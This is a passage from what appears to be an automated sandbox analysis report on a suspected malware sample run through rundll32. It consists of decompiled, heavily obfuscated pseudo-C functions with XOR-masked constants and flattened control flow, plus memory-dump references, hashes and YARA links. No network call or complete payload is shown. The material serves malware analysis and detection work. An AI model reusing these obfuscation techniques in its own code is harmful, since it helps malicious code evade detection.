				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E00B2F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00B38634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00B30126(_v32, _v24);
					}
					_t115 = E00B34AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}

0x00b38ae5
0x00b38aee
0x00b38af5
0x00b38afc
0x00b38b03
0x00b38b0e
0x00b38b10
0x00b38b15
0x00b38b1a
0x00b38b21
0x00b38b28
0x00b38b2f
0x00b38b36
0x00b38b3d
0x00b38b44
0x00b38b4b
0x00b38b52
0x00b38b59
0x00b38b60
0x00b38b67
0x00b38b6e
0x00b38b75
0x00b38b7c
0x00b38b83
0x00b38b8a
0x00b38b92
0x00b38b95
0x00b38b98
0x00b38b9f
0x00b38ba6
0x00b38baa
0x00b38bb1
0x00b38bb8
0x00b38bbc
0x00b38bc0
0x00b38bc7
0x00b38bce
0x00b38bdc
0x00b38bdf
0x00b38be6
0x00b38bed
0x00b38bf8
0x00b38bf9
0x00b38c01
0x00b38c07
0x00b38c0a
0x00b38c11
0x00b38c22
0x00b38c22
0x00b38c26
0x00000000
0x00000000
0x00b38c1c
0x00b38c2a
0x00b38c1e
0x00b38c1e
0x00b38c20
0x00b38c21
0x00000000
0x00b38c21
0x00b38c2d
0x00b38c42
0x00b38c48
0x00b38c66
0x00b38c7f
0x00b38c80
0x00000000
0x00b38c86
0x00b38c59
0x00b38c5e
0x00b38c64
0x00000000
0x00000000
0x00b38c8e
0x00b38c8e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction ID: 4a5b674162c7446c6c182ae0a9f787e44e0a6938c156fcdd43c78fc8ea386d68
Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction Fuzzy Hash: 2E514271C0121ADBEF49CFA4D84A5EEBBB1FF44304F20819AD011BA2A0D7B91B45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B248BD, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00B248BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0xb3c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00B28736(_t105);
				 *0xb3ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0xb3c110;
				 *_t95 = 0xb3c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0xb3c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00B21CFA(_v32, _t122) == 0) {
					E00B2F536(_v36, _v28, _v24,  *0xb3ca38);
					goto L7;
				}
				return 1;
			}

0x00b248cb
0x00b248cd
0x00b248ce
0x00b248d1
0x00b248d4
0x00b248d5
0x00b248d6
0x00b248db
0x00b248e4
0x00b248e9
0x00b248ec
0x00b248f3
0x00b248f7
0x00b248fb
0x00b24902
0x00b24909
0x00b2490d
0x00b24914
0x00b2491b
0x00b24922
0x00b2492e
0x00b24933
0x00b2493c
0x00b24940
0x00b24943
0x00b2494a
0x00b24951
0x00b24958
0x00b2495c
0x00b24963
0x00b2496a
0x00b24971
0x00b24978
0x00b2497f
0x00b24986
0x00b2498d
0x00b24994
0x00b2499b
0x00b249a8
0x00b249ab
0x00b249b2
0x00b249b9
0x00b249c2
0x00b249c3
0x00b249c6
0x00b249d6
0x00b249db
0x00b249e4
0x00b24a2c
0x00000000
0x00b24a2c
0x00b249e6
0x00b249e9
0x00b249ec
0x00b249ee
0x00b249f7
0x00b249f3
0x00b249f4
0x00b249f4
0x00b24a0f
0x00b24a25
0x00000000
0x00b24a2b
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b31b2a4eba41aef1a6f256061c03403c840d593bd7c7b9dc2e67f8b6853976
Instruction ID: 30c30027420a660d5df84639348ad4ace8f5aa239a69deec2a8a9ee6ded6bf11
Opcode Fuzzy Hash: c2b31b2a4eba41aef1a6f256061c03403c840d593bd7c7b9dc2e67f8b6853976
Instruction Fuzzy Hash: 064135B2D04219EFEB48CFA5D9864EEBBB5FF44314F20809AD505BB290D7B84A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1003B473, Relevance: .1, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5db8ec2e93bb3c38e6df5de28dcf86fd2157e8b95cfc68f7cb888f4e7748f06
Instruction ID: c656b33352300da800f92d77f99945cd2624eeeb88646af4ccbb705aeb87cfb2
Opcode Fuzzy Hash: f5db8ec2e93bb3c38e6df5de28dcf86fd2157e8b95cfc68f7cb888f4e7748f06
Instruction Fuzzy Hash: B421B673F208394B770CC47E8C5227DB6E1C68C501745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 1003B353, Relevance: .1, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff4470906935fb6da286988e7cec8f6d249cf1e5048b605e0ab24020fcbcac25
Instruction ID: 5dbac31fb3b63a5ed1dfcc0efb926e611d3acf2d5e288823d8aadfd5aa1fbe56
Opcode Fuzzy Hash: ff4470906935fb6da286988e7cec8f6d249cf1e5048b605e0ab24020fcbcac25
Instruction Fuzzy Hash: AE117323F30C355B675C81A98C172AAA5D2EBD815470F533AD826EB284E9A4DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 00B367E9, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B367E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0xb3ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0xb3ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E00B2F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E00B3086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E00B3422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00B34F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}

0x00b398a6
0x00b398a9
0x00b398b2
0x00b398bf
0x00b398c3
0x00b398cb
0x00b398cd
0x00b398d2
0x00b398d6
0x00b398dd
0x00b398e9
0x00b398ec
0x00b398f3
0x00b398fa
0x00b39901
0x00b39905
0x00b3990c
0x00b39913
0x00b3991c
0x00b3991f
0x00b39926
0x00b3992d
0x00b39934
0x00b39937
0x00b3993b
0x00b39942
0x00b39949
0x00b3994d
0x00b39951
0x00b39958
0x00b3995f
0x00b39966
0x00b3996a
0x00b39971
0x00b39978
0x00b3997f
0x00b39986
0x00b3998d
0x00b39994
0x00b3999b
0x00b399a6
0x00b399a9
0x00b399b0
0x00b399b7
0x00b399be
0x00b399c1
0x00b399c8
0x00b399cf
0x00b399d3
0x00b399d7
0x00b399de
0x00b39a46
0x00b399ea
0x00b39a2e
0x00b39a3b
0x00b39a3d
0x00b399ec
0x00b399f9
0x00b399fe
0x00b39a04
0x00b39a51
0x00b39a51
0x00b39a06
0x00b39a0d
0x00b39a19
0x00b39a27
0x00000000
0x00b39a2d
0x00b39a04
0x00b39a44
0x00b39a44
0x00b39a50

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270b2aba66d6b674aa679d88594e43f2c06a84633676eeb38163b5ed19450f8
Instruction ID: 58481e3cc809a4efa27191ea1cf25841fe26467de8d6ee8ed0e417aaf2cb6e80
Opcode Fuzzy Hash: b270b2aba66d6b674aa679d88594e43f2c06a84633676eeb38163b5ed19450f8
Instruction Fuzzy Hash: 0041FE72D0131DDBDB48CFE5DA8A4EEBBB0BB14758F208199C115BA290C7B80B49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B37A0F, Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B37A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00B37F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E00B2D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}

0x00b37a0f
0x00b37a15
0x00b37a21
0x00b37a28
0x00b37a2f
0x00b37a36
0x00b37a3d
0x00b37a44
0x00b37a48
0x00b37a4f
0x00b37a56
0x00b37a5a
0x00b37a61
0x00b37a68
0x00b37a6c
0x00b37a73
0x00b37a7a
0x00b37a7e
0x00b37a86
0x00b37a92
0x00b37a99
0x00b37aa3
0x00b37aa5
0x00b37aac
0x00b37aae
0x00b37aae
0x00b37ab4
0x00b37ae3
0x00b37ae4
0x00b37ae9
0x00b37aec
0x00b37aee
0x00000000
0x00b37ab6
0x00b37ab8
0x00000000
0x00b37aba
0x00b37ad2
0x00b37ad2
0x00b37ab8
0x00b37ad5
0x00b37adc
0x00b37adc
0x00b37af2
0x00b37af4
0x00b37af4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction ID: 10e330e67475ea3a1fee54b44bba69b3d64c51b5827240dac8da2d54a85b2e5d
Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction Fuzzy Hash: 142169B1E04219ABDB54DAA4D88A4AFFBB0FB50308F748099D505B3241E7B54B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B3687F, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00B3687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E00B3674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}

0x00b36885
0x00b3688c
0x00b36893
0x00b36897
0x00b3689b
0x00b368a2
0x00b368a9
0x00b368b0
0x00b368be
0x00b368c5
0x00b368c8
0x00b368cf
0x00b368da
0x00b368e0
0x00b368e7
0x00b368ee
0x00b368f5
0x00b368f9
0x00b36900
0x00b36907
0x00b3690e
0x00b36915
0x00b3691c
0x00b36923
0x00b3692a
0x00b3692e
0x00b36950
0x00b3695a
0x00b36964

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction ID: 73f19679979f18a28a58413dee30c32bc8280fba1e91a7cf11c20b9dc176376d
Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction Fuzzy Hash: 0021E0B2D0021EEBDB15CFE1C94A9EEBBB5FB10204F108299D521B61A0D3B84B59CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100267F4, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c00fd64b0b6dbcb9beef7772090face0066cd63d527137d98a1fd5bd32765b9d
Instruction ID: 66eff15202111fccf0a7c8d95225fb2e7e16f9dcd535e74fd26a087092d39107
Opcode Fuzzy Hash: c00fd64b0b6dbcb9beef7772090face0066cd63d527137d98a1fd5bd32765b9d
Instruction Fuzzy Hash: E0F0F032A54260ABC712CA5CAE55B48B7E8EB09B44F910291E602EB390CEB0DE00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 1002661A, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b61ba2a9695860e569c319edc5e6c5c71dde289f66b2b5d25be8a0529388c6
Instruction ID: 97217ad8dba5d0129fa98ca899641cafd385c0dc8ad7bdfbb9e94792b3533daa
Opcode Fuzzy Hash: 22b61ba2a9695860e569c319edc5e6c5c71dde289f66b2b5d25be8a0529388c6
Instruction Fuzzy Hash: 4EF0BE31A44285EFC742CE68FE59F08B7ECEB0D788FA04064E506DB290D679DE41C645

Uniqueness

Uniqueness Score: -1.00%

Function 1002673B, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dff28dc1353b6c53b1631460b6cb349a2ba39b5b7b5be24c05d17d60e649c85
Instruction ID: ca156b4c271f2ff34e0ad3de557cffee8235d24b156648402bbee209443292bf
Opcode Fuzzy Hash: 5dff28dc1353b6c53b1631460b6cb349a2ba39b5b7b5be24c05d17d60e649c85
Instruction Fuzzy Hash: 10F03031A152649BCB12C748E845A49B3B8EB49B99F624096F501D7151D774DD00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1002677F, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e11fc5522e44f442ff0deca1848ac05b4e2fdde56076012e59bc32853a84426
Instruction ID: 4afadca5389b6c2ce084e556022d067b21007e73e6122fbfdd99eaffe65c0e9f
Opcode Fuzzy Hash: 7e11fc5522e44f442ff0deca1848ac05b4e2fdde56076012e59bc32853a84426
Instruction Fuzzy Hash: E4F03932A15674ABCB12CB4CE845B89B3ECEB49B98F520896E401E7251E7B4EE40C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 10026594, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c60b7a9c3335ad2bb66ef415c2b8a6f28546c29e462a0ce88d083db758f99f
Instruction ID: 81a2276f03d9370e80cb445c887315b7debc13d61a8c89ba6614dea0100d47d2
Opcode Fuzzy Hash: 76c60b7a9c3335ad2bb66ef415c2b8a6f28546c29e462a0ce88d083db758f99f
Instruction Fuzzy Hash: 63E09A35601788EFCB45CF68C984A09B7F8EB49788FA140A8F40AC7650E734EE40CB00

Uniqueness

Uniqueness Score: -1.00%

Function 100265D7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6683db459a5caa38be91c53a785bec01800b869b12607d8a309da49395bc70f
Instruction ID: 9d18ab41e59b4812c29f078e082888d16a671906bc359d3429e04bd75a6d48b8
Opcode Fuzzy Hash: e6683db459a5caa38be91c53a785bec01800b869b12607d8a309da49395bc70f
Instruction Fuzzy Hash: 0AE06535A00288EFCB06CB68CA54B49B3E8FB49388FA148A8E409D7750E334EE40CB40

Uniqueness

Uniqueness Score: -1.00%

Function 100267C3, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c87a0f1a145202a697aae52e1c315a29966a3fd9373b6e61b6c42afe08dbea
Instruction ID: 19a26b7e9baf58ff5a1a5caac36cc593f268b1ea3bed36a77940ec1a48f2df19
Opcode Fuzzy Hash: 70c87a0f1a145202a697aae52e1c315a29966a3fd9373b6e61b6c42afe08dbea
Instruction Fuzzy Hash: B8E08C32915238EBCB11CBC8E90098AF3ECEB48A44B510096F502D3101C271DE00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 10026675, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

